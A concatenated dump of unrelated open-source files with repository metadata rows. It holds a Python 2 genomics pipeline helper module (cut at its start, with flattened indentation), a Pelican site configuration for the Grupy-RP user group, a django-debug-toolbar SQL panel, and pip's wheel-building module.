if n == last_step_n and outfile: #one-step pipeline with outfile
with open(outfile, 'w') as fh:
print "one step shlex: %s to file: %s" %(shlex.split(step), outfile)
p = Popen(shlex.split(step), stdout=fh)
break
print "first step shlex to stdout: %s" %(shlex.split(step))
p = Popen(shlex.split(step), stdout=PIPE)
#need to close p.stdout here?
elif n == last_step_n and outfile: #only treat the last step specially if you're sending stdout to a file
with open(outfile, 'w') as fh:
print "last step shlex: %s to file: %s" %(shlex.split(step), outfile)
p_last = Popen(shlex.split(step), stdin=p.stdout, stdout=fh)
p.stdout.close()
p = p_last
else: #handles intermediate steps and, in the case of a pipe to stdout, the last step
print "intermediate step %d shlex to stdout: %s" %(n,shlex.split(step))
p_next = Popen(shlex.split(step), stdin=p.stdout, stdout=PIPE)
p.stdout.close()
p = p_next
out,err = p.communicate()
return out,err
def uncompress(filename):
#leaves compressed file intact
m = re.match('(.*)(\.((gz)|(Z)|(bz)|(bz2)))',filename)
if m:
basename = m.group(1)
logging.info(subprocess.check_output(shlex.split('ls -l %s' %(filename))))
logging.info("Decompressing %s" %(filename))
#logging.info(subprocess.check_output(shlex.split('gzip -dc %s' %(filename))))
out,err = run_pipe([
'gzip -dc %s' %(filename)],
basename)
logging.info(subprocess.check_output(shlex.split('ls -l %s' %(basename))))
return basename
else:
return filename
def compress(filename):
#leaves uncompressed file intact
if re.match('(.*)(\.((gz)|(Z)|(bz)|(bz2)))',filename):
return filename
else:
logging.info(subprocess.check_output(shlex.split('cp %s tmp' %(filename))))
logging.info(subprocess.check_output(shlex.split('ls -l %s' %(filename))))
logging.info("Compressing %s" %(filename))
logging.info(subprocess.check_output(shlex.split('gzip %s' %(filename))))
new_filename = filename + '.gz'
logging.info(subprocess.check_output(shlex.split('cp tmp %s' %(filename))))
logging.info(subprocess.check_output(shlex.split('ls -l %s' %(new_filename))))
return new_filename
def count_lines(fname):
wc_output = subprocess.check_output(shlex.split('wc -l %s' %(fname)))
lines = wc_output.split()[0]
return int(lines)
def bed2bb(bed_filename, chrom_sizes, as_file, bed_type='bed6+4'):
if bed_filename.endswith('.bed'):
bb_filename = bed_filename[:-4] + '.bb'
else:
bb_filename = bed_filename + '.bb'
bed_filename_sorted = bed_filename + ".sorted"
logging.debug("In bed2bb with bed_filename=%s, chrom_sizes=%s, as_file=%s" %(bed_filename, chrom_sizes, as_file))
print "Sorting"
print subprocess.check_output(shlex.split("sort -k1,1 -k2,2n -o %s %s" %(bed_filename_sorted, bed_filename)), shell=False, stderr=subprocess.STDOUT)
for fn in [bed_filename, bed_filename_sorted, chrom_sizes, as_file]:
print "head %s" %(fn)
print subprocess.check_output('head %s' %(fn), shell=True, stderr=subprocess.STDOUT)
command = "bedToBigBed -type=%s -as=%s %s %s %s" %(bed_type, as_file, bed_filename_sorted, chrom_sizes, bb_filename)
print command
try:
process = subprocess.Popen(shlex.split(command), stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''):
sys.stdout.write(line)
process.wait()
returncode = process.returncode
if returncode != 0:
raise subprocess.CalledProcessError
except:
e = sys.exc_info()[0]
sys.stderr.write('%s: bedToBigBed failed. Skipping bb creation.' %(e))
return None
#print subprocess.check_output('ls -l', shell=True, stderr=subprocess.STDOUT)
#this is necessary in case bedToBegBed failes to create the bb file but doesn't return a non-zero returncode
try:
os.remove(bed_filename_sorted)
except:
pass
if not os.path.isfile(bb_filename):
bb_filename = None
print "Returning bb file %s" %(bb_filename)
return bb_filename
def rescale_scores(fn, scores_col, new_min=10, new_max=1000):
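    # Sorts the peak file by scores_col (descending), then linearly rescales that column from the
    # observed [min_score, max_score] range onto [new_min, new_max] with (n-a)*(y-x)/(b-a)+x, returning
    # the path to the rescaled copy.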
n_peaks = count_lines(fn)
sorted_fn = '%s-sorted' %(fn)
rescaled_fn = '%s-rescaled' %(fn)
out,err = run_pipe([
'sort -k %dgr,%dgr %s' %(scores_col, scores_col, fn),
r"""awk 'BEGIN{FS="\t";OFS="\t"}{if (NF != 0) print $0}'"""],
sorted_fn)
out, err = run_pipe([
'head -n 1 %s' %(sorted_fn),
'cut -f %s' %(scores_col)])
max_score = float(out.strip())
out, err = run_pipe([
'tail -n 1 %s' %(sorted_fn),
'cut -f %s' %(scores_col)])
min_score = float(out.strip())
out,err = run_pipe([
'cat %s' %(sorted_fn),
r"""awk 'BEGIN{OFS="\t"}{n=$%d;a=%d;b=%d;x=%d;y=%d}""" %(scores_col, min_score, max_score, new_min, new_max) + \
r"""{$%d=int(((n-a)*(y-x)/(b-a))+x) ; print $0}'""" %(scores_col)],
rescaled_fn)
return rescaled_fn
def processkey(key, keyfile=None):
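    # Expects the module-level KEYFILE (and DEFAULT_SERVER when no key is supplied) to be defined by the
    # caller; returns the (AUTHID, AUTHPW, SERVER) triple for the named key in the JSON keypairs file.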
import json
if not keyfile:
try:
keyfile = KEYFILE
except:
print >> sys.stderr, "No keyfile was specified."
raise
if key:
keysf = open(keyfile,'r')
keys_json_string = keysf.read()
keysf.close()
keys = json.loads(keys_json_string)
key_dict = keys[key]
else:
key_dict = {}
AUTHID = key_dict.get('key')
AUTHPW = key_dict.get('secret')
if key:
SERVER = key_dict.get('server')
else:
SERVER = DEFAULT_SERVER
if not SERVER.endswith("/"):
SERVER += "/"
return (AUTHID,AUTHPW,SERVER)
def encoded_get(url, keypair=None, frame='object'):
import urlparse, requests
HEADERS = {'content-type': 'application/json'}
url = urlparse.urljoin(url,'?format=json&frame=%s' %(frame))
if keypair:
response = requests.get(url, auth=keypair, headers=HEADERS)
else:
response = requests.get(url, headers=HEADERS)
return response.json()
def pprint_json(JSON_obj):
import json
print json.dumps(JSON_obj, sort_keys=True, indent=4, separators=(',', ': '))
def merge_dicts(*dict_args):
'''
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
'''
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
def md5(fn):
if 'md5_command' not in globals():
global md5_command
        if subprocess.call('which md5', shell=True) == 0:
md5_command = 'md5 -q'
        elif subprocess.call('which md5sum', shell=True) == 0:
md5_command = 'md5sum'
else:
md5_command = ''
md5_output = subprocess.check_output(' '.join([md5_command, fn]), shell=True)
return md5_output.partition(' ')[0].rstrip()
def after(date1, date2):
try:
result = dateutil.parser.parse(date1) > dateutil.parser.parse(date2)
except TypeError:
if not re.search('\+.*$', date1):
date1 += 'T00:00:00-07:00'
if not re.search('\+.*$', date2):
            date2 += 'T00:00:00-07:00'
try:
result = dateutil.parser.parse(date1) > dateutil.parser.parse(date2)
except Exception as e:
            logging.error("%s Cannot compare date %s with date %s" % (e, date1, date2))
raise
return result
def biorep_ns_generator(file_accession,server,keypair):
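    # Walks a file's derived_from chain on the ENCODE server until it reaches files that carry a
    # replicate, yielding each biological_replicate_number found along the way.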
m = re.match('^/?(files)?/?(\w*)', file_accession)
if m:
acc = m.group(2)
else:
return
url = urlparse.urljoin(server, '/files/%s' %(acc))
file_object = encoded_get(url, keypair)
if file_object.get('derived_from'):
for f in file_object.get('derived_from'):
for repnum in biorep_ns_generator(f,server,keypair):
yield repnum
else:
url = urlparse.urljoin(server, '%s' %(file_object.get('replicate')))
replicate_object = encoded_get(url, keypair)
yield replicate_object.get('biological_replicate_number')
def biorep_ns(file_accession,server,keypair):
return list(set(biorep_ns_generator(file_accession,server,keypair)))
| [
"[email protected]"
] | |
b08549cdc9930326c9806f5c1e261d6761327e2b | 4af5c720758bd4ef36ccf94934fa79ddfc6d29ab | /pelicanconf.py | a7b514784cb9a8bf6cbbdf25f15b355abd50c4a4 | [] | no_license | juhhcarmona/grupyrp.github.io | 5151fff8463821d8976ddf175281755b21a54675 | 9c1c68185ae95bd419bbb939493c3940fd5b319b | refs/heads/pelican | 2021-01-11T03:56:10.644068 | 2016-10-18T20:10:58 | 2016-10-18T20:10:58 | 71,271,500 | 0 | 0 | null | 2016-10-18T17:03:34 | 2016-10-18T17:03:31 | Python | UTF-8 | Python | false | false | 3,042 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
AUTHOR = u'Grupy-RP'
SITENAME = u'Grupy-RP'
SITEURL = ''
PATH = 'content'
TIMEZONE = 'America/Sao_Paulo'
THEME = 'themes/malt'
SITE_LOGO = 'images/logo/logo.png'
SITE_BACKGROUND_IMAGE = 'images/banners/aerea.jpg'
STATIC_PATHS = ['images', ]
WELCOME_TITLE = 'Grupy-RP'
DEFAULT_LANG = u'pt'
# Feed generation is usually not desired when developing
FEED_ALL_ATOM = None
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
AUTHOR_FEED_ATOM = None
AUTHOR_FEED_RSS = None
PAGE_URL = '{slug}'
PAGE_SAVE_AS = '{slug}.html'
INDEX_SAVE_AS = "blog/index.html"
PLUGIN_PATHS = ['./plugins']
PLUGINS = [
'members'
]
# Blogroll
LINKS = (('Pelican', 'http://getpelican.com/'),
('Python.org', 'http://python.org/'),
('Jinja2', 'http://jinja.pocoo.org/'),
('You can modify those links in your config file', '#'),)
# Social widget
SOCIAL = (('You can add links in your config file', '#'),
('Another social link', '#'),)
DEFAULT_PAGINATION = False
SOCIAL_LINKS = (
{
"href": "https://github.com/grupyrp",
"icon": "fa-github",
"text": "GitHub",
},
{
"href": "https://www.facebook.com/grupyrp",
"icon": "fa-facebook",
"text": "Facebook",
},
{
"href": "https://groups.google.com/forum/#!forum/grupy-rp",
"icon": "fa-envelope",
"text": "Lista de emails",
},
)
MALT_HOME = [
{
"color": "blue-grey lighten-5",
"title": "O que Fazemos?",
"items": [
{
"title": "Comunidade",
"icon": "fa-comments",
"text": (
"Somos uma comunidade de desenvolvedores e entusiastas da "
"linguagem de programação Python, aqui alguns lugares onde "
"nos encontrar"),
"buttons": [
{
"text": "Saiba Mais",
"href": "comunidade",
},
],
},
{
"title": "Membros",
"icon": "fa-users",
"text": (
"Nosso grupo é formado pelos mais diversos tipos de "
"pessoas, com histórias e personalidades diferentes, veja"
"quem somos"),
"buttons": [
{
"text": "Conheça",
"href": "membros",
},
],
},
{
"title": "Projetos",
"icon": "fa-briefcase",
"text": "",
"buttons": [
{
"text": "Mais detalhes",
"href": "",
},
],
},
]
},
]
# Uncomment following line if you want document-relative URLs when developing
# RELATIVE_URLS = True
| [
"[email protected]"
] | |
7290065a273141e75604456bb17635a31582454d | d1f32ec9b972c38951939978f12b3ad20db6a96c | /src/debug_toolbar/panels/sql/panel.py | 71ef283f0edf4d6938f26482d8b613cab760c605 | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | domyhero/sentry | b69f4a4fec38d6ed7adc199f24a866528e92b87e | a418072946ebd2933724945e1ea2a833cf4c9b94 | refs/heads/master | 2021-01-01T16:21:44.227712 | 2017-07-19T22:32:00 | 2017-07-19T22:48:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,038 | py | from __future__ import absolute_import, unicode_literals
import uuid
from copy import copy
from collections import defaultdict
from django.conf.urls import url
from django.db import connections
from django.utils.translation import ugettext_lazy as _, ungettext_lazy as __
from debug_toolbar.panels import Panel
from debug_toolbar.panels.sql.forms import SQLSelectForm
from debug_toolbar.utils import render_stacktrace
from debug_toolbar.panels.sql.utils import reformat_sql, contrasting_color_generator
from debug_toolbar.panels.sql.tracking import wrap_cursor, unwrap_cursor
from debug_toolbar.panels.sql import views
def get_isolation_level_display(vendor, level):
if vendor == 'postgresql':
import psycopg2.extensions
choices = {
psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT: _("Autocommit"),
psycopg2.extensions.ISOLATION_LEVEL_READ_UNCOMMITTED: _("Read uncommitted"),
psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED: _("Read committed"),
psycopg2.extensions.ISOLATION_LEVEL_REPEATABLE_READ: _("Repeatable read"),
psycopg2.extensions.ISOLATION_LEVEL_SERIALIZABLE: _("Serializable"),
}
else:
raise ValueError(vendor)
return choices.get(level)
def get_transaction_status_display(vendor, level):
if vendor == 'postgresql':
import psycopg2.extensions
choices = {
psycopg2.extensions.TRANSACTION_STATUS_IDLE: _("Idle"),
psycopg2.extensions.TRANSACTION_STATUS_ACTIVE: _("Active"),
psycopg2.extensions.TRANSACTION_STATUS_INTRANS: _("In transaction"),
psycopg2.extensions.TRANSACTION_STATUS_INERROR: _("In error"),
psycopg2.extensions.TRANSACTION_STATUS_UNKNOWN: _("Unknown"),
}
else:
raise ValueError(vendor)
return choices.get(level)
class SQLPanel(Panel):
"""
Panel that displays information about the SQL queries run while processing
the request.
"""
def __init__(self, *args, **kwargs):
super(SQLPanel, self).__init__(*args, **kwargs)
self._offset = dict((k, len(connections[k].queries)) for k in connections)
self._sql_time = 0
self._num_queries = 0
self._queries = []
self._databases = {}
self._transaction_status = {}
self._transaction_ids = {}
def get_transaction_id(self, alias):
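        # Tracks the connection's transaction status between calls and hands out a fresh uuid whenever the
        # status flips to a new active transaction, so queries can be grouped by the transaction they ran in.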
if alias not in connections:
return
conn = connections[alias].connection
if not conn:
return
if conn.vendor == 'postgresql':
cur_status = conn.get_transaction_status()
else:
raise ValueError(conn.vendor)
last_status = self._transaction_status.get(alias)
self._transaction_status[alias] = cur_status
if not cur_status:
# No available state
return None
if cur_status != last_status:
if cur_status:
self._transaction_ids[alias] = uuid.uuid4().hex
else:
self._transaction_ids[alias] = None
return self._transaction_ids[alias]
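    # Illustrative note (not part of the original module): for a PostgreSQL
    # connection, get_transaction_id() hands out a fresh uuid4 hex when the
    # connection's transaction status changes to a non-idle value, then keeps
    # returning that same id until the status changes again; an idle status
    # yields None, and a non-PostgreSQL vendor raises ValueError.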
def record(self, alias, **kwargs):
self._queries.append((alias, kwargs))
if alias not in self._databases:
self._databases[alias] = {
'time_spent': kwargs['duration'],
'num_queries': 1,
}
else:
self._databases[alias]['time_spent'] += kwargs['duration']
self._databases[alias]['num_queries'] += 1
self._sql_time += kwargs['duration']
self._num_queries += 1
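    # Illustrative sketch (not part of the original module): the cursor wrapper in
    # tracking.py is expected to call record() once per executed query, roughly like
    #   panel.record('default', duration=1.8, sql='SELECT ...', raw_sql='SELECT ...',
    #                vendor='postgresql', stacktrace=[...])
    # Only 'duration' is read here; the other keys are consumed later in
    # process_response().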
# Implement the Panel API
nav_title = _("SQL")
@property
def nav_subtitle(self):
return __("%d query in %.2fms", "%d queries in %.2fms",
self._num_queries) % (self._num_queries, self._sql_time)
@property
def title(self):
count = len(self._databases)
return __('SQL queries from %(count)d connection',
'SQL queries from %(count)d connections',
count) % {'count': count}
template = 'debug_toolbar/panels/sql.html'
@classmethod
def get_urls(cls):
return [
url(r'^sql_select/$', views.sql_select, name='sql_select'),
url(r'^sql_explain/$', views.sql_explain, name='sql_explain'),
url(r'^sql_profile/$', views.sql_profile, name='sql_profile'),
]
def enable_instrumentation(self):
# This is thread-safe because database connections are thread-local.
for connection in connections.all():
wrap_cursor(connection, self)
def disable_instrumentation(self):
for connection in connections.all():
unwrap_cursor(connection)
def process_response(self, request, response):
colors = contrasting_color_generator()
trace_colors = defaultdict(lambda: next(colors))
query_duplicates = defaultdict(lambda: defaultdict(int))
if self._queries:
width_ratio_tally = 0
factor = int(256.0 / (len(self._databases) * 2.5))
for n, db in enumerate(self._databases.values()):
rgb = [0, 0, 0]
color = n % 3
rgb[color] = 256 - n / 3 * factor
nn = color
# XXX: pretty sure this is horrible after so many aliases
while rgb[color] < factor:
nc = min(256 - rgb[color], 256)
rgb[color] += nc
nn += 1
if nn > 2:
nn = 0
rgb[nn] = nc
db['rgb_color'] = rgb
trans_ids = {}
trans_id = None
i = 0
for alias, query in self._queries:
query_duplicates[alias][query["raw_sql"]] += 1
trans_id = query.get('trans_id')
last_trans_id = trans_ids.get(alias)
if trans_id != last_trans_id:
if last_trans_id:
self._queries[(i - 1)][1]['ends_trans'] = True
trans_ids[alias] = trans_id
if trans_id:
query['starts_trans'] = True
if trans_id:
query['in_trans'] = True
query['alias'] = alias
if 'iso_level' in query:
query['iso_level'] = get_isolation_level_display(query['vendor'],
query['iso_level'])
if 'trans_status' in query:
query['trans_status'] = get_transaction_status_display(query['vendor'],
query['trans_status'])
query['form'] = SQLSelectForm(auto_id=None, initial=copy(query))
if query['sql']:
query['sql'] = reformat_sql(query['sql'])
query['rgb_color'] = self._databases[alias]['rgb_color']
try:
query['width_ratio'] = (query['duration'] / self._sql_time) * 100
query['width_ratio_relative'] = (
100.0 * query['width_ratio'] / (100.0 - width_ratio_tally))
except ZeroDivisionError:
query['width_ratio'] = 0
query['width_ratio_relative'] = 0
query['start_offset'] = width_ratio_tally
query['end_offset'] = query['width_ratio'] + query['start_offset']
width_ratio_tally += query['width_ratio']
query['stacktrace'] = render_stacktrace(query['stacktrace'])
i += 1
query['trace_color'] = trace_colors[query['stacktrace']]
if trans_id:
self._queries[(i - 1)][1]['ends_trans'] = True
        # Queries are duplicates only if there are at least 2 of them.
# Also, to hide queries, we need to give all the duplicate groups an id
query_duplicates = dict(
(alias, dict(
(query, duplicate_count)
for query, duplicate_count in queries.items()
if duplicate_count >= 2
))
for alias, queries in query_duplicates.items()
)
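        # Illustrative sketch (not part of the original module): after the filtering
        # above, query_duplicates maps each alias to only the statements seen at
        # least twice, e.g.
        #   {'default': {'SELECT "auth_user"."id" FROM "auth_user"': 3}}
        # so single-occurrence queries are never flagged as duplicates below.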
for alias, query in self._queries:
try:
duplicates_count = query_duplicates[alias][query["raw_sql"]]
query["duplicate_count"] = duplicates_count
except KeyError:
pass
for alias, alias_info in self._databases.items():
try:
alias_info["duplicate_count"] = sum(e for e in query_duplicates[alias].values())
except KeyError:
pass
self.record_stats({
'databases': sorted(self._databases.items(), key=lambda x: -x[1]['time_spent']),
'queries': [q for a, q in self._queries],
'sql_time': self._sql_time,
})

# File: /venv/lib/python3.9/site-packages/pip/_internal/wheel_builder.py (repo: CiscoDevNet/meraki-code, license: MIT)

"""Orchestrator for building wheels from InstallRequirements.
"""
import logging
import os.path
import re
import shutil
import zipfile
from pip._vendor.packaging.utils import canonicalize_name, canonicalize_version
from pip._vendor.packaging.version import InvalidVersion, Version
from pip._vendor.pkg_resources import Distribution
from pip._internal.exceptions import InvalidWheelFilename, UnsupportedWheel
from pip._internal.models.link import Link
from pip._internal.models.wheel import Wheel
from pip._internal.operations.build.wheel import build_wheel_pep517
from pip._internal.operations.build.wheel_legacy import build_wheel_legacy
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import ensure_dir, hash_file, is_wheel_installed
from pip._internal.utils.setuptools_build import make_setuptools_clean_args
from pip._internal.utils.subprocess import call_subprocess
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.utils.urls import path_to_url
from pip._internal.utils.wheel import pkg_resources_distribution_for_wheel
from pip._internal.vcs import vcs
if MYPY_CHECK_RUNNING:
from typing import Any, Callable, Iterable, List, Optional, Tuple
from pip._internal.cache import WheelCache
from pip._internal.req.req_install import InstallRequirement
BinaryAllowedPredicate = Callable[[InstallRequirement], bool]
BuildResult = Tuple[List[InstallRequirement], List[InstallRequirement]]
logger = logging.getLogger(__name__)
_egg_info_re = re.compile(r'([a-z0-9_.]+)-([a-z0-9_.!+-]+)', re.IGNORECASE)
def _contains_egg_info(s):
# type: (str) -> bool
"""Determine whether the string looks like an egg_info.
:param s: The string to parse. E.g. foo-2.1
"""
return bool(_egg_info_re.search(s))
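# Illustrative examples (not part of the original module) of how the regex behaves:
#   _contains_egg_info("pip-20.2.3")  # True, a name-version pair just like "foo-2.1"
#   _contains_egg_info("master")      # False, no name-version pair to match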
def _should_build(
req, # type: InstallRequirement
need_wheel, # type: bool
check_binary_allowed, # type: BinaryAllowedPredicate
):
# type: (...) -> bool
"""Return whether an InstallRequirement should be built into a wheel."""
if req.constraint:
# never build requirements that are merely constraints
return False
if req.is_wheel:
if need_wheel:
logger.info(
'Skipping %s, due to already being wheel.', req.name,
)
return False
if need_wheel:
# i.e. pip wheel, not pip install
return True
# From this point, this concerns the pip install command only
# (need_wheel=False).
if req.editable or not req.source_dir:
return False
if req.use_pep517:
return True
if not check_binary_allowed(req):
logger.info(
"Skipping wheel build for %s, due to binaries "
"being disabled for it.", req.name,
)
return False
if not is_wheel_installed():
# we don't build legacy requirements if wheel is not installed
logger.info(
"Using legacy 'setup.py install' for %s, "
"since package 'wheel' is not installed.", req.name,
)
return False
return True
def should_build_for_wheel_command(
req, # type: InstallRequirement
):
# type: (...) -> bool
return _should_build(
req, need_wheel=True, check_binary_allowed=_always_true
)
def should_build_for_install_command(
req, # type: InstallRequirement
check_binary_allowed, # type: BinaryAllowedPredicate
):
# type: (...) -> bool
return _should_build(
req, need_wheel=False, check_binary_allowed=check_binary_allowed
)
def _should_cache(
req, # type: InstallRequirement
):
# type: (...) -> Optional[bool]
"""
Return whether a built InstallRequirement can be stored in the persistent
wheel cache, assuming the wheel cache is available, and _should_build()
has determined a wheel needs to be built.
"""
if req.editable or not req.source_dir:
# never cache editable requirements
return False
if req.link and req.link.is_vcs:
# VCS checkout. Do not cache
# unless it points to an immutable commit hash.
assert not req.editable
assert req.source_dir
vcs_backend = vcs.get_backend_for_scheme(req.link.scheme)
assert vcs_backend
if vcs_backend.is_immutable_rev_checkout(req.link.url, req.source_dir):
return True
return False
assert req.link
base, ext = req.link.splitext()
if _contains_egg_info(base):
return True
# Otherwise, do not cache.
return False
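# Illustrative sketch (not part of the original module): a requirement whose link
# filename embeds a name-version pair (e.g. "pip-20.2.3.tar.gz") is cacheable,
# while an editable requirement, or a VCS link checked out at a mutable reference
# such as a branch name, is not.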
def _get_cache_dir(
req, # type: InstallRequirement
wheel_cache, # type: WheelCache
):
# type: (...) -> str
"""Return the persistent or temporary cache directory where the built
wheel need to be stored.
"""
cache_available = bool(wheel_cache.cache_dir)
assert req.link
if cache_available and _should_cache(req):
cache_dir = wheel_cache.get_path_for_link(req.link)
else:
cache_dir = wheel_cache.get_ephem_path_for_link(req.link)
return cache_dir
def _always_true(_):
# type: (Any) -> bool
return True
def _get_metadata_version(dist):
# type: (Distribution) -> Optional[Version]
for line in dist.get_metadata_lines(dist.PKG_INFO):
if line.lower().startswith("metadata-version:"):
value = line.split(":", 1)[-1].strip()
try:
return Version(value)
except InvalidVersion:
msg = "Invalid Metadata-Version: {}".format(value)
raise UnsupportedWheel(msg)
raise UnsupportedWheel("Missing Metadata-Version")
def _verify_one(req, wheel_path):
# type: (InstallRequirement, str) -> None
canonical_name = canonicalize_name(req.name)
w = Wheel(os.path.basename(wheel_path))
if canonicalize_name(w.name) != canonical_name:
raise InvalidWheelFilename(
"Wheel has unexpected file name: expected {!r}, "
"got {!r}".format(canonical_name, w.name),
)
with zipfile.ZipFile(wheel_path, allowZip64=True) as zf:
dist = pkg_resources_distribution_for_wheel(
zf, canonical_name, wheel_path,
)
if canonicalize_version(dist.version) != canonicalize_version(w.version):
raise InvalidWheelFilename(
"Wheel has unexpected file name: expected {!r}, "
"got {!r}".format(dist.version, w.version),
)
if (_get_metadata_version(dist) >= Version("1.2")
and not isinstance(dist.parsed_version, Version)):
raise UnsupportedWheel(
"Metadata 1.2 mandates PEP 440 version, "
"but {!r} is not".format(dist.version)
)
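# Illustrative sketch (not part of the original module): for a requirement named
# "SomeProject" at version 1.0, a file "someproject-1.0-py3-none-any.whl" passes,
# while "otherproject-1.0-py3-none-any.whl" raises InvalidWheelFilename because
# the canonicalized names disagree.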
def _build_one(
req, # type: InstallRequirement
output_dir, # type: str
verify, # type: bool
build_options, # type: List[str]
global_options, # type: List[str]
):
# type: (...) -> Optional[str]
"""Build one wheel.
:return: The filename of the built wheel, or None if the build failed.
"""
try:
ensure_dir(output_dir)
except OSError as e:
logger.warning(
"Building wheel for %s failed: %s",
req.name, e,
)
return None
# Install build deps into temporary directory (PEP 518)
with req.build_env:
wheel_path = _build_one_inside_env(
req, output_dir, build_options, global_options
)
if wheel_path and verify:
try:
_verify_one(req, wheel_path)
except (InvalidWheelFilename, UnsupportedWheel) as e:
logger.warning("Built wheel for %s is invalid: %s", req.name, e)
return None
return wheel_path
def _build_one_inside_env(
req, # type: InstallRequirement
output_dir, # type: str
build_options, # type: List[str]
global_options, # type: List[str]
):
# type: (...) -> Optional[str]
with TempDirectory(kind="wheel") as temp_dir:
assert req.name
if req.use_pep517:
assert req.metadata_directory
wheel_path = build_wheel_pep517(
name=req.name,
backend=req.pep517_backend,
metadata_directory=req.metadata_directory,
build_options=build_options,
tempd=temp_dir.path,
)
else:
wheel_path = build_wheel_legacy(
name=req.name,
setup_py_path=req.setup_py_path,
source_dir=req.unpacked_source_directory,
global_options=global_options,
build_options=build_options,
tempd=temp_dir.path,
)
if wheel_path is not None:
wheel_name = os.path.basename(wheel_path)
dest_path = os.path.join(output_dir, wheel_name)
try:
wheel_hash, length = hash_file(wheel_path)
shutil.move(wheel_path, dest_path)
logger.info('Created wheel for %s: '
'filename=%s size=%d sha256=%s',
req.name, wheel_name, length,
wheel_hash.hexdigest())
logger.info('Stored in directory: %s', output_dir)
return dest_path
except Exception as e:
logger.warning(
"Building wheel for %s failed: %s",
req.name, e,
)
# Ignore return, we can't do anything else useful.
if not req.use_pep517:
_clean_one_legacy(req, global_options)
return None
def _clean_one_legacy(req, global_options):
# type: (InstallRequirement, List[str]) -> bool
clean_args = make_setuptools_clean_args(
req.setup_py_path,
global_options=global_options,
)
logger.info('Running setup.py clean for %s', req.name)
try:
call_subprocess(clean_args, cwd=req.source_dir)
return True
except Exception:
logger.error('Failed cleaning build dir for %s', req.name)
return False
def build(
requirements, # type: Iterable[InstallRequirement]
wheel_cache, # type: WheelCache
verify, # type: bool
build_options, # type: List[str]
global_options, # type: List[str]
):
# type: (...) -> BuildResult
"""Build wheels.
:return: The list of InstallRequirement that succeeded to build and
the list of InstallRequirement that failed to build.
"""
if not requirements:
return [], []
# Build the wheels.
logger.info(
'Building wheels for collected packages: %s',
', '.join(req.name for req in requirements), # type: ignore
)
with indent_log():
build_successes, build_failures = [], []
for req in requirements:
cache_dir = _get_cache_dir(req, wheel_cache)
wheel_file = _build_one(
req, cache_dir, verify, build_options, global_options
)
if wheel_file:
# Update the link for this.
req.link = Link(path_to_url(wheel_file))
req.local_file_path = req.link.file_path
assert req.link.is_wheel
build_successes.append(req)
else:
build_failures.append(req)
# notify success/failure
if build_successes:
logger.info(
'Successfully built %s',
' '.join([req.name for req in build_successes]), # type: ignore
)
if build_failures:
logger.info(
'Failed to build %s',
' '.join([req.name for req in build_failures]), # type: ignore
)
# Return a list of requirements that failed to build
return build_successes, build_failures
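# Illustrative usage sketch (not part of the original module); the variable names
# are assumptions:
#   successes, failures = build(
#       requirements, wheel_cache=cache, verify=True,
#       build_options=[], global_options=[],
#   )
# Each successfully built requirement comes back with req.link repointed at the
# freshly built wheel file.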